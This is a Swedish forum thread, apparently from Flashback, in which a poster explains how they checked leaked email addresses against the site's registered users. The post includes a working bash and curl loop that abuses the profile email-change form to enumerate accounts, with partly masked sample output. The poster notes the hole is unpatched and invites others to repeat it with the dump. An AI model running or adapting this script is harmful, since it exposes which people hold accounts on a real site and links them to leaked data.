Citat:
Ursprungligen postat av
Cognitive Dissident
Klart tekniska detaljer aldrig skadar.
Men mest nyfiken på varför du bara kollade .se-domäner. Nu duger de kanske för en statistisk säkerhet, men ändå.
.se-TLDs var i stor majoritet och eftersom detta är ett svenskt forum så tyckte jag det var mest passande. Tycker ändå att resultatet talar för sig själv; dumpen är från 2007:ish.
Citat:
Ursprungligen postat av
Dr.MadScience
Oki, och det innebär att du har möjlighet att hyfsat enkelt avgöra om en emailaddress är flashbackreggad? Jag menar, du (ja script) testade väl inte att byta passwd/skapa nytt konto på flashback för varje av dessa tusentals emailaddresser, på så pass kort tid? Alltså, med andra ord, göra precis samma sak som RG eventuellt gjort.
Jo, det var så jag gjorde. Tog väl en timme. Skulle gått snabbare om jag koda det i Python eller Perl. Nåväl, här kommer skriptet + förklaringen:
[PHP]while read line
do
a=$(curl -s --cookie "kakan för Flashback" --data "s=&do=updatepassword¤tpassword_md5=59bcc3ad 6775562f845953cf01624225&newpassword_md5=&newpassw ordconfirm_md5=¤tpassword=&newpassword=&newp asswordconfirm=&email="$line"&emailconfirm="$line "https://www.flashback.org/profile.php" | grep -o "<blockquote>")
echo $line "-" $a
done<email[/PHP]
Det hela sker på
https://www.flashback.org/profile.php?do=editpassword - dvs den sidan där du kan byta din e-postadress. För att detta skript ska fungera så behöver du en kaka så Flashback vet att du är inloggad, dessutom behöver du veta en MD5-summa av ditt lösenord för den postas till Flashback när du vill byta e-postadress.
Koden är simpel att förstå. Den läser rad för rad ur en fil och gör sedan ett anrop mot Flashback, sedan får man resultatet tillbaka och jag fångar då in bara "<blockquote>", hittar jag inte denna sträng så kommer inget att skrivas ut.
Försöker du ändra till en e-post som redan finns på Flashback så möts du av:
Citat:
E-postadressen som du har angivit används redan. Om du har glömt ditt lösenord kan du klicka här.
HTML-koden för detta är:
HTML-kod:
<blockquote><p>E-postadressen som du har angivit används redan. Om du har glömt ditt lösenord kan du klicka <a href="login.php?do=lostpw">här</a>.</p></blockquote>
Och som ni ser, "<blockquote>", det är därför jag greppar efter "<blockquote>", hittar jag denna tag efter en POST så vet jag att adressen finns på Flashback, hittas ingenting så skrivs ingenting ut.
Kör jag filen så skrivs det ut likt(censurerat igen):
Kod:
tig****vete@hotmail.com - <blockquote>
mika****n@gmail.com - <blockquote>
m_****on@hotmail.com - <blockquote>
si****@hotmail.com - <blockquote>
p****0@yahoo.com - <blockquote>
Och då behöver jag bara greppa efter "<blockquote>" för då vet jag att adressen finns i Flashback.
Koden:
Kod:
grep -v "<blockquote>" ut
Betyder att jag letar efter rader som
INTE innehåller <blockquote>, dvs e-postadresser som INTE finns på Flashback. Skriver jag "wc -l" efter så betyder det att jag vill veta hur många rader utdatan gav. (-l = lines)
Eftersom det ännu inte är patchat så kan ni själva verifiera detta. Ni har koden, förklaringen samt dumpen.
Citat:
Ursprungligen postat av
Dr.MadScience
Jag är inte hemma i denna del av forumet, men har förstått att .Chloe har en stor skopa med trovärdighet i bagaget. But, still...
Ja, klart att ni ska vara källkritiska! Absolut backar jag upp min fakta, t.ex, kolla ovanför.